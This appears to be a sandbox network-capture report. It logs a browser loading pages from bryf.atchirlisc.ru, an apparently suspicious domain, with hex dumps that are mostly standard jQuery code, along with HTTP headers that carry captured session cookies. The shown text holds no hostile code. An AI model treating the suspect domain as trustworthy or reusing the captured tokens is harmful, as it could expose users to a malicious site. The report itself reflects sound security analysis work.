                                                                                                                                                                                    2025-01-09 14:29:43 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                    2025-01-09 14:29:43 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                    2025-01-09 14:29:43 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                    2025-01-09 14:29:43 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.449743104.21.80.14435664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:29:44 UTC1324OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                    Host: bryf.atchirlisc.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bryf.atchirlisc.ru/EeMAGvIe/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: XSRF-TOKEN=eyJpdiI6IlBhWmpGMDVWZ01jS0xzWm9RVGJ1VkE9PSIsInZhbHVlIjoia1BUemJwcVdBTWdYaURwRGxueFlaZ3FlM3QvalNpcnk2REFqbmVvbTFsbEZnNzl5Y0plbW9CQTNVZGZLQmw0aXZoUEQvVEt2ejZrWVMxUlpRWUVwWks2dzRwR2QvSDNLYU94MHJqdXlDYld6VWdsYW5Pa0NWOE1vQUx2WmxmZWgiLCJtYWMiOiIyZGY1YWNlMTg4Mzk3ODliNTUxMDZiNTA4ODM3YmMxNDcwM2ZhZGIwYzVmZTQ3ODE4ODU2OTYyZTQ4YjRlMmIyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImwvSU9DVUgvSmM0bDNKT1FTWXJ4Q1E9PSIsInZhbHVlIjoiT0UvWkFpOEpGMDcrM0pmay9sUEhjOXd4b0F4OUNBbmhrUEFJRi96K3JEU3haVGNZQWJPUDhseXRHYzVEUnFmSnVLTXl6WENENlhiNzNwTjBIVWVmbVpkaXpWdm9DMENPSlBFaGZqcjdscjB0em5SNUxkMGVLbWlFQmR1V3lTVTgiLCJtYWMiOiIyNDk2ZjJiZTE2MmE5ZjhhMDQ5ZTM3MWMyZWRmZWZjYTBlOGNiYTdhMzgyNmQ1ZmRmNTBmMjBmYmNkNjI4YzNjIiwidGFnIjoiIn0%3D
                                                                                                                                                                                    2025-01-09 14:29:44 UTC1078INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:29:44 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                    Age: 6653
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCVyA2PmCfeA6ON61TEjBpw%2Fm12h53FjdAjxb4FjBGXqwn1FWtJRvY1aQKGCLi3Cy6IY8gvA3is%2Fk8cLz1KQGXWbMe0zkt6QAiJf%2Ftxe%2FQyWZveMmFngujKg7zpljg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=73699&min_rtt=73492&rtt_var=41&sent=545&recv=206&lost=0&retrans=0&sent_bytes=715236&recv_bytes=15884&delivery_rate=3850888&cwnd=4&unsent_bytes=0&cid=22be797f844a5494&ts=355703&x=0"
                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ff51f08da638c0f-EWR
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1966&rtt_var=983&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4204&recv_bytes=1902&delivery_rate=212348&cwnd=223&unsent_bytes=0&cid=a292274667ecbea8&ts=2793&x=0"
                                                                                                                                                                                    2025-01-09 14:29:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.44975035.190.80.14435664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:29:45 UTC539OUTOPTIONS /report/v4?s=RCVyA2PmCfeA6ON61TEjBpw%2Fm12h53FjdAjxb4FjBGXqwn1FWtJRvY1aQKGCLi3Cy6IY8gvA3is%2Fk8cLz1KQGXWbMe0zkt6QAiJf%2Ftxe%2FQyWZveMmFngujKg7zpljg%3D%3D HTTP/1.1
                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Origin: https://bryf.atchirlisc.ru
                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2025-01-09 14:29:45 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                    access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                    access-control-allow-headers: content-length, content-type
                                                                                                                                                                                    date: Thu, 09 Jan 2025 14:29:44 GMT
                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.449752151.101.2.1374435664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:29:45 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                    Host: code.jquery.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2025-01-09 14:29:45 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 89501
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                    ETag: "28feccc0-15d9d"
                                                                                                                                                                                    Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                    Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:29:45 GMT
                                                                                                                                                                                    Age: 1917511
                                                                                                                                                                                    X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740035-EWR
                                                                                                                                                                                    X-Cache: HIT, HIT
                                                                                                                                                                                    X-Cache-Hits: 2774, 1
                                                                                                                                                                                    X-Timer: S1736432986.573925,VS0,VE1
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                    Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                    Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                    Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                    Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                    Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                    Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                    Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                    Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
